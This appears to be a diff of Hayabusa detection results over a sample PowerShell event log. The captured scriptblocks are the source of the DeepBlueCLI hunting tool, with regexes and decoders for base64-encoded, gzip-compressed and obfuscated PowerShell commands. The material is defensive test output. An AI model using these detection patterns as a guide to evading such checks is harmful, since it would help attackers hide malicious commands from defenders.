$maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.430 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.522 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.524 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:48.525 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:44:49.697 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.700 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:47:01.705 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return 